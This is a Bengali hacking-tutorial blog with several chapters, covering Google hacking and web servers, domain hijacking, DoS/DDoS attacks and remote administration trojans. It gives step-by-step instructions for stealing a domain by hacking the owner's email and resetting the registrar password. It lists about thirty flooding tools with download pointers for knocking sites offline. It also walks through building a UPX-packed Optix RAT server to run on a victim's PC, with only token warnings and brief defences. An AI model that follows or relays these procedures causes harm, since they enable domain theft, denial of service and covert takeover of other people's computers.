ইন্টারনেটের প্রায় ৮০ ভাগ সার্চ কোয়েরী আসে গুগলের সার্ভার থেকে। এটা বর্তমানে সর্বাপেক্ষা শক্তিশালী এবং জনপ্রিয় সার্চ ইঞ্জিনে পরিনত হয়েছে। এটার জনপ্রিয়তা এর সার্চ ক্ষমতা থেকেই আসে নি, বরং এটার কোয়েরী বা ইনডেক্সিং করার ক্ষমতা থেকেই এসেছে। যাহোক, আমাদের মনে রাখা উচিত যে, ইন্টারনেট হচেছ একটি উচ্চ ক্ষমতা সম্পন্ন মাধ্যম, যার কারনে গুগল যে রেজাল্টগুলো দেয় তা সবসময় আপ-টু-ডেট হয়না বা কিছু তথ্য হয়ত চুরি হয়ে যায়।এছাড়াও কিছু নিষিদ্ধ উপাদান গুগলবট (এটা গুগলের স্বয়ংক্রিয় স্ক্রিপ্ট যা ইন্টারনেটের সকল তথ্যাদি গুগল সার্ভারে জমা করে রাখে) দ্বারা ভিজিটও হয়না। আমরা জানি যে, গুগল একটা সার্চ ইঞ্জিন।

গুগলের কিছু নির্দিষ্ট ষ্ট্রিং বা কমান্ড দিয়ে সার্চের মাধ্যমে গুগল কর্তৃক হ্যাকিং কার্য সম্পন্ন করা হয়। যেটাকে গুগল এ্যাডভান্সড অপারেটর বলা হয়। এর মাধ্যমেই দৈনিক লাখো লাখো ওয়েবসাইট বের করা হয় যেগুলো হ্যাকিং আক্রমন উপযোগী।

প্রিয় বন্ধুরা, এই বাংলা ব্লগ-এ আপনারা পড়ছেন অধ্যায়: ২০ বেসিক ওয়েবসাইট হ্যাকিং (তথ্য)-২

অধ্যায়: ১৯ বেসিক ওয়েবসাইট হ্যাকিং (তথ্য)-১


ওয়েব সার্ভার :
এটি এক ধরনের সেবা যেটা যেখানে কোন ওয়েবসাইটের উপাদানসমূহ থাকে সেই কম্পিউটারের মাধ্যমে রান হয়। যেটাকে আমরা শুনে থাকি পোর্ট ৮০ বা http বা https নামে। এ্যাপাচি একধরনের ওয়েব সার্ভারের উদাহরন।

ওয়েব সার্ভারের কার্যপ্রণালী :
প্রথমে আমাদের ব্রাউজার একটি সার্ভারের সাথে সংযুক্ত হয় এবং একটি পেজের জন্য অনুরোধ পাঠায়। তারপর ঐ সার্ভার ঐ পেজ সহ অনুরোধটিতে সাড়া দেয়। এখানে মূলত তিনটি প্রক্রিয়া।

১। সার্ভার এবং ব্রাউজারের মধ্যে একটি সংযোগ তৈরী হওয়া
২। ব্রাউজার থেকে সার্ভারে একটি অনুরোধ পাঠানো
৩। সার্ভার থেকে অনুরোধে সাড়া প্রদান।
সাধারন কিছু কাজ :
 ধাপ-১
ব্রাউজার কোন ওয়েবসাইটের ইউআরএল (URL) কে তিনটি ভাগে বিভক্ত করে।
১। প্রোটোকল (http)
২। সার্ভার নাম (www.example.com)
৩। ফাইল নাম (index.html/index.php)
ধাপ-২
ব্রাউজারটি একটি আইপি এড্রেসের মধ্য দিয়ে নাম সার্ভার দিয়ে সার্ভারটি অনুবাদ বা পড়ার জন্য সংযুক্ত হয় যেটা মূলত সার্ভারের মূল যন্ত্রের সাথে সংযোগ রক্ষা করে।
ধাপ-৩
ব্রাউজারটি তারপর পোর্ট ৮০ এবং আইপি এড্রেসের মধ্য দিয়ে মূল সার্ভারে যুক্ত হয়ে যায়।
ধাপ-৪
এই পোর্ট ৮০ বা http কে অনুসরন করে, ব্রাউজারটি ঐ সার্ভারে GET অনুরোধ পাঠায়, যেটি http://www.example.com/index.php নামে কোন ফাইলের খোজ করে।
নোট : কুকিসের মাধ্যমে (এটি একটি ক্ষুদ্র টেক্সট বা লেখা যেটি ইউজারের কম্পিউটারে সংরক্ষিত থাকে, এটি আসে মূলত ব্রাউজারের মাধ্যমে এবং এই টেক্সট বা লেখাটিতেই কিছু তথ্য লুকায়িত অবস্থায় থাকে।) ব্রাউজার GET অনুরোধ পাঠাতে পারে।
ধাপ-৫
সার্ভারটি তখন কাঙ্খিত ওয়েবসাইটটির জন্য html ফাইলটি প্রেরন করে। (এক্ষেত্রেও সার্ভার থেকে কুকিস প্রেরন হতে পারে।)
ধাপ-৬
ব্রাউজারটি এবার html ফাইলটি পরতে চেষ্ঠা করে এবং এটি ব্রাউজারের স্ক্রিনে প্রদর্শনের ব্যবস্থা করে।
একটি ওয়েব সার্ভার সেট করা :
একটি ওয়েবসার্ভার সেট করতে সাধারনত যেসকল টুলস গুলো কাজে লাগে সেগুলো হল-
১। এ্যাপাচি বা এই জাতিয় কোন টুলস
২। ইন্টারনেট ইনফরমেশন সার্ভিস (IIS)
ওয়েবসাইটে লগইন প্রক্রিয়া :
আপনি আপনার কম্পিউটারে বসে আছেন। ইন্টারনেটে ব্রাউজ করছেন, একটি ওয়েবসাইট ওপেন করলেন যেটাতে আপনি লগইন করবেন।
১।  আপনি আপনার লগইন ইউজারনেম এবং পাসওয়ার্ড দিবেন। সাইন ইন বা লগ ইন এ ক্লিক করবেন এবং আপনি আপনার একাউন্টে প্রবেশ করবেন।
২। ওয়েব সার্ভার ইউজারনেম এবং পাসওয়ার্ড পেল এবং এগুলো সে ডাটাবেস সার্ভারকে পাঠিয়ে দিল।
৩। ডাটাবেস সার্ভার (যেখানে সকল তথ্যাদি জমা থাকে) ওয়েব সার্ভার থেকে ইউজারনেম এবং পাসওয়ার্ড পেল এবং এই ইউজারনেম এবং পাসওয়ার্ডের জন্য এর টেবিল খুজে দেখে এবং এর ফলাফল পুনরায় ওয়েবসার্ভারে পাঠিযে দেয়।
৪। ওয়েব সার্ভার ডাটাবেস সার্ভার থেকে ফলাফল পেল এবং এই রেজাল্টের উপর নির্ভর করেই সে ইউজারকে নির্দিষ্ট স্থানে প্রেরন করল।

প্রিয় বন্ধুরা, এই বাংলা ব্লগ-এ আপনারা পড়ছেন অধ্যায়: ১৯ বেসিক ওয়েবসাইট হ্যাকিং (তথ্য)-১

অধ্যায়: ১৮ ডোমেইন হাইজ্যাকিং : যেভাবে ডোমেইন হাইজ্যাক করতে হয়


আজকে আমাদের আলোচনার বিষয়বস্তু হচ্ছে কিভাবে কোন ডোমেইন হাইজ্যাক করতে হয় এবং কিভাবে এই হাইজ্যাকিং হতে ডোমেইন রক্ষা করতে হয়।
ডোমেইন হাইজ্যাকিং কী?
আসলে ডোমেইন হ্যাকিংকেই বলা হয় ডোমেইন হাইজ্যাকিং। ডোমেইন হাইজ্যাকিং হচ্ছে এমন একটি প্রক্রিয়া যেখানে ইন্টারনেটের ডোমেইন নাম তার প্রকৃত মালিক থেকে চুরি করা হয়। তাই অন্য অর্থে একে ডোমেইন চুরি-ও বলা হয়। কিভাবে ডোমেইন হাইজ্যাক করা হয় সেটা জানার আগে আমাদের জানতে হবে কিভাবে কোন ডোমেইন কাজ করে এবং কিভাবে ডোমেইন কোন ওয়েব হোস্টিংয়ের সাথে যুক্ত করা হয়।
যেভাবে ডোমেইন কাজ করে :

উদাহরনস্বরূপ www.google.com এর দুটি অংশ রয়েছে। একটি হচ্ছে এর ডোমেইন নাম অন্যটি হচ্ছে এটি যে ওয়েবসার্ভার এর সাথে যুক্ত রয়েছে সেটি। মূলত ডোমেইন নাম এবং হোস্টিং সম্পূর্ণ রূপে দুই জিনিস এবং কোন ওয়েবসাইটের সাফল্য বলতে বুঝায় এই দুটির পারস্পরিক সম্পর্কভিত্তিক আচরনকে। কিভাবে ডোমেইন নামের সাথে হোস্টিং যুক্ত করা হয় সেটি নিচে দেয়া হল :

১। ডোমেইন নাম রেজিষ্ট্রেশন করার পর আমরা একটি কন্টোল প্যানেল পাই যার মাধ্যমে আমরা সম্পূর্ণ রূপে ডোমেইনটিকে কন্ট্রোল করতে পারি।
২। ঐ ডোমেইন কন্ট্রোল প্যানেলের মাধ্যমেই সেই ডোমেইনটিকে হোস্টিং (যেখানে ওয়েবসাইটের ফাইলগুলো সংরক্ষিত থাকে) এর সাথে যুক্ত করা হয়।
একটি উদাহরন দেয়া যাক :
মনে করি করিম একটি ডোমেইন নাম রেজিষ্ট্রেশন করেছে যার ঠিকানা হচ্ছে www.abc.com ধরি এই ডোমেইনটি যেখান থেকে রেজিষ্ট্রেশন করা হয়েছে সেটির নাম হচ্ছে “ক” কোম্পানী। এখন করিম তার হোস্টিং ক্রয় করেছে “খ” কোম্পানী থেকে। এখন সে তার সবগুলো ফাইল (.html/.php/javascript ইত্যাদি) যা কিনা ওয়েবসাইটের মূল কন্টেন্ট সেগুলো সে ঐ “খ” কোম্পানীর হোস্টিংয়ে আপলোড করল। এবার ডোমেইন কন্ট্রোল প্যানেল থেকে সে ডোমেইনটিকে তার হোস্টিং এর সাথে যুক্ত করে দিল। এখন যখন কোন ইন্টারনেট ইউজার তার ব্রাউজারে www.abc.com টাইপ করল তখন সেই ডোমেইন নামটি সরাসরি ঐ হোস্টিংয়ে কনভার্ট হয়ে গেল যেখানে ফাইলগুলো আপলোডকৃত অবস্থায় ছিল। এভাবেই সে ঐ ওয়েবসাইটটিকে দেখতে পেল।
যখন একটি ডোমেইন হাইজ্যাক হয় তখন কি ঘটে?
কোন ডোমেইন হাইজ্যাক করতে হলে প্রথমেই সেই ডোমেইনটির কন্ট্রোল প্যানেলে প্রবেশ করতে হয়। তারপর এটি যেই সার্ভারের সাথে যুক্ত সেটি বদলিয়ে অন্য একটি হোস্টিংয়ের সাথে যুক্ত করে দিতে হয়। তাহলে দেখা যাচ্ছে কোন ডোমেইন হাইজ্যাকের জন্য আপনাকে সেই ওয়েবসাইটটির হোস্টিংয়ে আক্রমন করতে হচ্ছে না। উদাহরনস্বরূপ, কোন হ্যাকার www.abc.com ডোমেইনের কন্টোল প্যানেলে প্রবেশ করল। এখন সে ঐ ডোমেইনটি যে হোস্টিংয়ের সাথে যুক্ত সেটি বদলিয়ে নতুন একটি হোস্টিংয়ে কনভার্ট করে দিল যার মালিক হতে পারে ঐ হ্যাকার। এখন কোন ইন্টারনেট ব্যবহারকারী যদি তার ব্রাউজারে www.abc.com লিখে তাহলে সে করিমের ওয়েবসাইটের বদলে ঐ হ্যাকারের ওয়েবসাইট দেখতে পাবে। এটাই মূলত ডোমেইন হাইজ্যাকিংয়ের মূল ব্যাপার।
যেভাবে ডোমেইন নাম হাইজ্যাক করা হয় :
কোন ডোমেইন হাইজ্যাক করার জন্য প্রথম কাজ হচ্ছে ঐ ডোমেইনটির কন্ট্রোল প্যানেলে প্রবেশ করা।এক্ষেত্রে নিম্নোক্ত উপাদানগুলো আপনার লাগবে।
১। ডোমেইনটি যে কোম্পানী থেকে রেজিষ্ট্রেশন করা হয়েছে তার নাম/ঠিকানা/ওয়েব এ্যাড্রেস।
২। ডোমেইন মালিকের ইমেইল এ্যড্রেস।

উপরোক্ত তথ্যগুলো ঐ ডোমেইনটির হুইজ (WHOIS) চেক করার মাধ্যমে পাওয়া যেতে পারে। এক্ষেত্রে আপনি আপনার ব্রাউজারে লিখুন http://whois.domaintools.com এবং এর খালি ঘরে আপনার টার্গেট ডোমেইনটি লিখুন এরপর Lookup এ ক্লিক করুন।যখন সবতথ্য লোড হবে তখন মাউসের স্ক্রোল ঘুরিয়ে একেবারে নিচের দিকে দেখতে পাবেন লেখা রয়েছে Whois Record। এবার সেখানে আপনি ডোমেইন মালিকের ইমেইল এ্যাড্রেস পাবেন। এখন ডোমেইন রেজিষ্ট্রেশন কোম্পানীর নাম পেতে হলে খুজুন “Registration Service Provided By: ABC Company”. এখানে ABC কোম্পনীই হচ্ছে ডোমেইনটির রেজিষ্ট্রারার। কোন কারনে যদি আপনি তা না পান তাহলে খুজুন ICANN Registrar যেটি থাকবে “Registry Data” এর মধ্যে। এখানে যেই কোম্পানীর নাম পাবেন সেটিই ডোমেইন রেজিষ্ট্রারার।

এখন আমরা ডোমেইন মালিকের যে ইমেইল ঠিকানাটি পেলাম সেটিই ডোমেইন হাইজ্যাকিংয়ের ক্ষেত্রে ব্যাকডোর (এটি নিয়ে পড়ে একসময় আলোচনা হবে ইনশাআল্লাহ) হিসেবে কাজ করবে। ডোমেইন কন্ট্রোল প্যানেলে প্রবেশের জন্য এটি হচ্ছে চাবি। এবার ডোমেইন কন্ট্রোল প্যানেলের সম্পূর্ণ কন্ট্রোল পেতে হলে প্রথমেই হ্যাকারকে এই ইমেইল এড্রসটি হ্যাক করতে হবে। ইমেইল হ্যাকিং অনেকভাবেই করা যায়। যা পূর্বে বিভিন্ন টিউনে আলোচনা করা হয়েছে। তবে আবারো বলছি ইমেইল হ্যাকিংয়ের প্রসিদ্ধ উপায় হচ্ছে-

১। ফিশিং
২। সোস্যাল ইঞ্জিনিয়ারিং
৩। কী-লগার ইত্যাদি।

যখন হ্যাকার ইমেইল এড্রেসটি হ্যাকিং করল তখন সে ডোমেইন রেজিষ্ট্রারার এর ওয়েবসাইটে প্রবেশ করবে। এখন সে লগইন পেজের Forget Password এ ক্লিক করবে।এখন পাসওয়ার্ড রিসেট করার জন্য হয়ত তাকে ডোমেইনটির নাম বা মালিকের ইমেইল ঠিকানা দিতে হবে। যেহেতু হ্যাকার মালিকের ইমেইর এ্যাড্রেসটির সম্পূর্ণ কন্ট্রোল পূর্বেই পেয়ে গেছে সুতরাং পাসওয়ার্ড রিসেট করা তার পক্ষে সহজ কাজ। পাসওয়ার্ড রিসেট করার পর সে ডোমেইন রেজিষ্ট্রারার সাইটে নতুন পাসওয়ার্ড দিয়ে লগইন করবে এবং কয়েক মিনিটের মধ্যেই ডোমেইনটি হাইজ্যাক করে নিবে।
যেভাবে ডোমেইন হাইজ্যাক প্রতিরোধ করা যায় :
ডোমেইন হাইজ্যাক প্রতিরোধের সর্বাপেক্ষা প্রসিদ্ধ উপায় হচ্ছে ডোমেইনটির সাথে যে ইমেইল এ্যাড্রেসটি যুক্ত সেটি রক্ষা করা। যদি আপনি ইমেইলটি হারান তাহলে ধরে নিতে হবে আপনি আপনার ডোমেইনটিও হারিয়েছেন। আপনি অনেকভাবেই ইমেইল রক্ষা করতে পারেন। এ নিয়ে অনেক আলোচনা ইন্টারনেটে খুজে পাবেন। আরো একভাবে ডোমেইন রক্ষা করা যায়। সেটি হচেছ প্রাইভেট রেজিষ্ট্রেশন। প্রতিটি ডোমেইন রেজিষ্ট্রারার কোম্পানীই এই সেবাটি প্রদান করে থাকে। কাউকে এর জন্য অতিরিক্ত অর্থ দিতে হয় কেউবা বিনামূল্যে এই সেবাটি প্রদান করে থাকে। এক্ষেত্রে কেউ যদি আপনার ডোমেইনটির ব্যাপারে হু্ইজ চেক করে তাহলে সে ডোমেইনটির মালিকের ব্যাপারে কোন তথ্যই পাবে না। সবকিছু লুকানো থাকবে। তাই আমি সবাইকে বলব আপনারা সবাই প্রাইভেট রেজিষ্ট্রেশন ব্যবহার করুন। সবাই ভালো থাকবেন।

প্রিয় বন্ধুরা, এই বাংলা ব্লগ-এ আপনারা পড়ছেন অধ্যায়: ১৮ ডোমেইন হাইজ্যাকিং : যেভাবে ডোমেইন হাইজ্যাক করতে হয়

অধ্যায়: ১৭ DOS/DDOS এ্যাটাক : ওয়েবসাইট নিষ্ক্রিয় করার সহজতম উপায়


২০০০ সালের ৬ই ফেব্রুয়ারী ইমেইল সেবাদানকারী প্রতিষ্ঠান ৩ ঘন্টার জন্য মুখ থুবড়ে পরেছিল। এর পরেই একেএকে bay.com, ebay.com, amazon.com, cnn.com, etrade.com এই রোগে আক্রান্ত হয়। আসলে কি ঘটেছিল যে, বিশ্বের এত শক্তীশালী ওয়েবসাইটগুলোর কার্যক্রম বন্ধ হয়ে গিয়েছিল?

আপনারা হয়ত জেনে থাকবেন যেদিন পপগুরু মাইকেল জ্যাকসন মৃত্যুবরন করেন সেদিন বা তারপর দিন গুগল এবং টুইটারে তেমন একটা কাজ করা যায় নি। পত্রিকায় পড়ে থাকবেন, সেদিন সারাবিশ্বের অগনিত মানুষ মাইকেলের মৃত্যুর সংবাদ সঠিক কিনা সেটি জানার জন্য গুগল এবং টুইটারে সার্চ দিয়েছিল যার কারনে গুগল এবং টুইটারের ট্রাফিক কিছুক্ষনের জন্য থমকে গিয়েছিল। যদিও এটা কোন হ্যাকিং না। কিন্তু এভাবেই মূলত ডেনাইয়্যাল অব সার্ভিস এবং ডিসট্রিবিউটেড ডেনাইয়্যাল অব সার্ভিস ঘটে থাকে। এটা এক ধরনের হ্যাকিং।
আমাদের আজকের আলোচনা এটা নিয়েই।

ডস/ডিডস এ্যাটাকের সংগা উইকিপিডিয়া থেকে তুলে দেয়া হল :
ডেনাইয়াল অফ সার্ভিস অ্যাটাক বা সেবা বাধাদানের আক্রমণ হলো কোনো কম্পিউটার সিস্টেমের কোনো রিসোর্স বা সেবার প্রকৃত ব্যবহারকারীদের বাধা দেয়ার একটি কৌশল। কোনো কম্পিউটার সিস্টেম বা ইন্টারনেট ওয়েবসাইটে এই আক্রমণ চালানোর মাধ্যমে ঐ সিস্টেম বা সাইটের যথাযথ কার্যক্রমকে ধীর গতির, বা অনেক ক্ষেত্রে পুরোপুরি বন্ধ করে দেয়া হয়।

এই আক্রমণ চালানোর একটা বেশ জনপ্রিয় পদ্ধতি হলো বাইরে থেকে ঐ সিস্টেম বা সাইটের সাথে যোগাযোগের জন্য অসংখ্য বার্তা পাঠাতে থাকা। একটি বার্তা বিশ্লেষণ করতে করতে আরো বেশ কয়টি বার্তা যদি এসে পড়ে, তখন ঐ সিস্টেমটি আক্রমণকারীর পাঠানো বার্তা বিশ্লেষণেই ব্যস্ত থাকে, এবং প্রকৃত ব্যবহারকারীরা ধীর গতির সম্মুখীন হন।

ডেনাইয়াল অফ সার্ভিস আক্রমণের প্রধান দুটি মাধ্যম হলো
• টার্গেট করা কম্পিউটারকে রিসেট করে দেয়া, অথবা তার সীমিত রিসোর্সগুলোকে ব্যবহার করে অন্যদের ব্যবহারের অযোগ্য করে ফেলা
• আক্রমণের লক্ষ্য যে সিস্টেম বা সাইট, তার সাথে প্রকৃত ব্যবহারকারীদের যোগাযোগের মাধ্যম বন্ধ করে দেয়া।
একটি উদাহরন :
ধরা যাক, করিমের একটি সাইট আছে যার নাম কখগ ডট কম। এই ওয়েবসাইটটি যে খানে হোস্ট করা হয়েছে, সেখানে দৈনিক ১ গিগাবাইট ব্যান্ডউইডথ কেনা আছে। দিনে ১০ হাজার হিট হয় এই সাইটে, এবং ৪০০ মেগাবাইটের বেশি ব্যান্ড উইডথ দরকার হয় না। এখন এই ওয়েবসাইটকে আক্রমণকারী শত্রু শওকত একটি স্ক্রিপ্ট লিখে ঐ সাইটে অজস্র ভুয়া হিট করতে থাকলো, ফলে এক ঘণ্টারও কম সময়ে ২৫০০০ হিট করে ১ গিগাবাইট সীমা অতিক্রম করে ফেলা হলো। এখন ওয়েবসাইট ব্যবহারকারীদের কেউই আর ঐ সাইটে যেতে পারবেন না।

ধরা যাক, করিম এবার আক্রমণ ঠেকানোর জন্য অসীম ব্যান্ডউইডথের ব্যবস্থা করলেন, এবং শওকতের কম্পিউটারের আইপি অ্যাড্রেস নিষিদ্ধ করে দিলেন। এবার শওকত ভিন্ন পদ্ধতিতে আগালেন … সরাসরি আক্রমণ করার বদলে “স্মার্ফ অ্যাটাক” (Smurf attack) নামের আক্রমণ করলেন। এই আক্রমণের সময়ে শওকত সরাসরি করিমের কম্পিউটারে আক্রমণ না করে ইন্টারনেটে হাজার হাজার সাইটে পিং মেসেজ পাঠালেন। (সংযোগ ঠিক আছে কি না, তা পরীক্ষা করার জন্য পিং ব্যবহৃত হয়। এই মেসেজ কোনো কম্পিউটারে পাঠালে ঐ কম্পিউটার মেসেজের জবাবে আরেকটি মেসেজ প্রেরক কম্পিউটারে পাঠায়)। তবে শওকত পিং পাঠানোর আগে কারসাজি করে মেসেজের প্রেরকের নাম পালটে দিলেন, অর্থাৎ প্রেরকের ঠিকানার অংশে নিজের কম্পিউটারের আইপির বদলে করিমের সাইটের আইপি দিয়ে দিলেন। ফলে হাজার হাজার সাইট যখন এই পিং বার্তার জবাব দিবে, তখন সেই জবাব গুলো চলে যাবে করিমের কম্পিউটারে। একই সময়ে আসা এই হাজার হাজার বার্তা গ্রহণ করতে করতে করিমের কম্পিউটার আসল গ্রাহকদের সাথে যোগাযোগ করার সময় পাবে না। ফলে ওয়েবসাইটটিতে যারা ঢুকতে যাবেন, তাঁরা ব্যর্থ হবেন।
ডস এ্যাটাকের ধরন :
১। ব্যান্ডউইথ এ্যাটাক
২। প্রোটোকল এ্যাটাক এবং
৩। লজিক এ্যাটাক।
ডিডস এ্যাটাক কী?
এক্ষেত্রে যিনি এ্যাটাক পরিচালনা করেন তিনি অনেকগুলো পিসি থেকে এ্যাটাক চালান। এটা ট্রেস করা কঠিন কারন একই সময়ে অনেক আইপি থেকে এ্যাটাক পরিচালনা করা হয়।
যদি একটি আইপি থেকে এ্যাটাক করা হয় তাহলে ঐ সাইটটির ফায়ারওয়াল সেই আইপিটিকে ব্যান করে দেবে কিন্তু একই সাথে যদি ৫০০০০ আইপি থেকে এ্যাটাক চালানো হয় তাহলে এটা আসলেই অসম্ভব ট্রেস করা।
যে যে টুলসগুলো সাধারনত ডস/ডিডস এ্যাটাকে ব্যবহৃত হয় :
• NetBotAtt14En
• Click v2.2
• Spoofed IRC Nuker v1.3
• Hartz4Flooder v0.2
• Bitslap
• Crazyping v1.1
• Killme v1.0
• Bd0rk’s DoS killer
• Krate port bomber
• Fed up v2.0
• Gimp
• Muerte v2.1
• Kaput v1.0 & beta v1.5
• Donut http flooder v1.4
• Blood lust
• Hospitables nuker v2.2
• Bitchslap v1.0
• Razors DoS tool v1.1
• Try2DdoS
• Firewall killer v1.3
• Death n destruction
• Assault v1.0
• NetBot Attacker v1.4 English
• Panteher v2.0
• Battle Pong
• Nemesy v1.3
• Meliksah nuke v2.5
• Inferno Nuker
• Rocket v1.0
• Igmp nuke v1.0

সবগুলো টুলস এখান থেকে ডাউনলোড করে নিন।
এছাড়াও সার্ভার এ্যাটাক নামে আরেকটি টুল রয়েছে সেটি এখান থেকে ডাউনলোড করে নিন।


সবগুলো টুলসের কার্যপ্রনালী মোটামুটি একই। প্রথমে ওপেন করে সার্ভার আইপি এবং পোর্ট দিতে হয় অথবা সরাসরি ওয়েবসাইটের এ্যাড্রেস দেয়ারও সিস্টেম রয়েছে কয়েকটি টুলসে। তারপর এ্যাটাক বা ফ্ল্যাড বা এধরনের কোন বাটনে ক্লিক করতে হয়। ব্যাস তারপর শুরু হয়ে যাবে তান্ডব।
ডস/ডিডস থেকে রক্ষা পাওয়ার উপায় কী?
এতক্ষন আমরা জানলাম কিভাবে ডস এ্যাটাক পরিচালনা করা হয়। এখন আমাদের এটা জানা জরুরী যে কিভাবে এটা প্রতিরোধ করা যায়। ডস/ডিডস এ্যাটাক প্রতিরোধের কয়েকটি গাইডলাইন রয়েছে তন্মধ্যে অন্যতম গুলো হচ্ছে ব্যান্ডউইথ লিমিটেড, রোবাস্ট ডিজাইন, লিস্ট এ্যামাউন্ট অব সার্ভিস রান করানো, সিস্টেম প্যাচগুলো রেখে দেয়া ইত্যাদি। প্রয়োজনীয় ট্রাফিক রেখে দিয়ে ঐসব আইপিগুলো ব্লক করে দেয়া যেগুলো পোর্ট স্ক্যানিং বা লুকানো ডাইরেক্টরী খুজতে চেষ্টা করে। সত্য কথা বলতে গেলে ডস/ডিডস প্রতিরোধের ভালো কোন উপায় নেই। কারন এটা কেউই জানে না যে, কোথা থেকে এটা আসবে এবং কতগুলো হোস্ট থেকে এটা পরিচালিত হবে। তাই কাঙ্খিত ওয়েবসাইটটি সবসময় আপডেটেড এবং প্যাচেস রাখলে ডস এ্যাটাক অনেকাংশে এড়ানো সম্ভব।

প্রিয় বন্ধুরা, এই বাংলা ব্লগ-এ আপনারা পড়ছেন অধ্যায়: ১৭ DOS/DDOS এ্যাটাক : ওয়েবসাইট নিষ্ক্রিয় করার সহজতম উপায়

অধ্যায়: ১৬ রেটস (সার্ভার পিসি হ্যাক করার উপায়) আপডেটেড



.::: সকলের কাছে অনুরোধ কেউ নেগেটিভ ভাবে ব্যবহার করবেন না :::.
সূচনা :

রেট এর সম্পূর্ণ নাম হচ্ছে রিমোট এ্যাডমিনিস্ট্রেশন টুল যা রিমোট সংযোগের ক্ষেত্রে ব্যবহৃত হয় এবং অনেকগুলো টুলের সাহায্যে এটা একটি বা কয়েকটি কম্পিউটার পরিচালনা করতে পারে। টুলগুলোর মধ্যে অন্যতম হচ্ছে :

. স্ক্রিন বা ক্যামেরা ক্যাপচারিং

. ফাইল রক্ষনাবেক্ষন (ডাউনলোড/আপলোড/এক্সিকিউট ইত্যাদি)

. শেল পরিচালনা (যা অনেকক্ষেত্রে কমান্ড এরিয়ার সাথে সামঞ্জস্যপূর্ণ)

. কম্পিউটার পরিচালনা (কম্পিউটার চালু/বন্ধ বা ইউজার চালু/বন্ধ করা) ইত্যাদি।

যদিও এগুলো ভালো কাজে ব্যবহারের জন্য সফটওয়্রার ডেভেলোপারগন তৈরী করেছিলেন কিন্তু এরও খারাপ দিকে ব্যবহার রয়েছে। রেটের মাধ্যমে আপনি আপনার ল্যান সংযোগের সাথে সংযোগকৃত সবগুলো কম্পিউটার সার্ভার রক্ষনাবেক্ষন করতে পারবেন। সাধারনত স্কুল কলেজ বা সাইবার ক্যাফেগুলোতে এভাবে ল্যান সংযোগ দেয়া থাকে। আপনি রেট ব্যবহার করে যেকোন একটি পিসিতে বসে আপনি যেকোন কম্পিউটার হ্যাক করতে পারেন।…….lol

রেট ট্রোজান হর্স ভাইরাস :

বর্তমানে অনেক ট্রোজান বা ব্যাকডোরের রিমোট এডমিনিস্ট্রেশন ক্ষমতা থাকে যার সাহায্যে ব্যক্তিগতভাবে শিকারের কম্পিউটার পরিচালনা করা সম্ভব। অনেক সময় কম্পিউটারে একটি ফাইল ট্রোজান আক্রমনের আগে ওপেন । এই ধরনের ফাইল সাধারনত ইমেইলের মাধ্যমে,পিটুপি সফটওয়্যার শেয়ারের মাধ্যমে বা ইন্টারনেটে সফটওয়্যার ডাউনলোডের মাধ্যমে পাঠানো হয়। এগুলো আপাত দৃষ্টিতে আসলের মতই লাগে। সাধারনত অনেক সার্ভার সফটওয়্যার ওপেনের সময় এরর মেসেজ দেখায়। অর্থাৎ মনে হয় এটা ওপেন হবে না। কিছু রয়েছে খুব শক্তিশালী যারা কম্পিউটারে থাকা এন্টিভাইরাস এবং ফায়ারওয়াল নষ্ট করে দেয়। রেট ট্রোজান হর্স ভাইরাস সাধারনত নিম্নোক্ত কাজগুলোতে পারদর্শী :

. কোন ফাইল ডাউনলোড/আপলোড/ডিলিট বা রিনেম করা

. ড্রাইভ ফরম্যাট করা

. সিডি/ডিভিডি রোম অটো ওপেন করা

. পিসিতে ভাইরাস বা ওয়ার্ম ছেড়ে দেয়া

. কী-স্ট্রোক লগ বাইপাস করা

. পাসওয়ার্ড বা ক্রোডিট কার্ড নাম্বার হ্যাক করা

. ওয়েবসাইটের হোমপেজ হাইজ্যাক করা

. অটো স্ক্রিন ক্যাপচার করা

. টাস্কবারে অটো কোন টাস্ক রান/ডিলিট করা

. ডেস্কটপ, টাস্কবার বা কোন ফাইল লুকিয়ে ফেলা

. কোন টেক্সট কমান্ডবিহীনভাবে প্রিন্ট করা

. অটো সাউন্ড প্লে করা

. মাউসের কার্সরের অস্বাভাবিক নড়াচড়া

. সংযোগকৃত মাইক্রোফোনের সাউন্ড অটো রেকর্ড করা

. ওয়েবক্যামের মাধ্যমে অটো ভিডিও রেকর্ডিং করা ইত্যাদি।

কিছু কিছু রেট সাধারনত বন্ধু দিবস, ভালোবাসা দিবস, স্বাধীনতা দিবস বা অন্য কোন দিবসে নিজেদের স্বয়ংক্রিয়ভাবে নিজেদের সক্রিয় করতে পারে। যেগুলোকে প্রাংক বলা হয়। প্রাংকগুলো অতটা ক্ষতিকর না এবং এরা কী-স্ট্রোক বাইপাস বা হ্যাকিংয়ের সাথে জড়িতও না। এরা সাধারনত কম্পিউটারের স্ক্রিন উল্টে দেয়া, সিডি/ডিভিডি ড্রাইভ অটো ওপেন করা, মাউসের কার্সর অস্বাভাবিক ভাবে নাড়াচাড়া করে। সাধারনত এসকল প্রাংক কম্পিউটার থেকে রিমোভ করা কিছুটা কষ্টসাধ্য।

স্বনামধন্য রেট সফটওয়্যার :
• Shark

• Bifrost

• Bandook

• BO2K

• ProRAT

• SpyRAT

• HackRAT

• Netbos

• Optixe

• AutoSpY

• Nclear

• Amituer

• Bandk

• Yuri RAT

• Y3k RAT

• slha RAT

• Openx RAT

• Poison Ivy RAT

• Mosucker

• SubSeven RAT

• Nuclear RAT

• NetBus RAT

• ProRAT

• megapanzer

• LanHelper

তবে আমার ব্যক্তিগত মতে Optixe টা ভালো।

এখন আপনাদের জন্য একটি টিউটোরিয়াল দিচ্ছি কিভাবে আপনি অপটিক্স ব্যবহার করবেন।

সূচনা :

প্রথমে এখান থেকে সফটওয়্যারটি ডাউনলোড করুন।

এটা খুব একটা কঠিন ব্যাপার না। এই সফটওয়্যারটি সার্ভার ফাইল তৈরীতে ব্যবহৃত হয়। যেমন :

.ClientClient.exe = Client

.BuilderBuilder.exe = Builder

সতর্কতা : Builder.exe দিয়ে তৈরীকৃত ফাইলটি কখনই আপনার পিসিতে রান করাবেন না। আপনি যে পিসির কর্তত্ব নিতে চান সেটিতে রান করাতে হবে।

টিউটোরিয়াল :

. Builder খুলুন

. Build/Create Server এ ক্লিক করুন

. সার্ভারটিকে server.exe এই নামে সেভ করুন

. UPX Packing এ ক্লিক করুন

. ওকে প্রেস করুন

. এবার server.exe ফাইলটিকে আপনি যে কম্পিউটারের কতৃত্ব নিতে চান সেটিতে রান করান (কখনই আপনার নিজের পিসিতে নয়)

. Client ওপেন করুন

. অন্য কম্পিউটারটির আইপি লিখুন

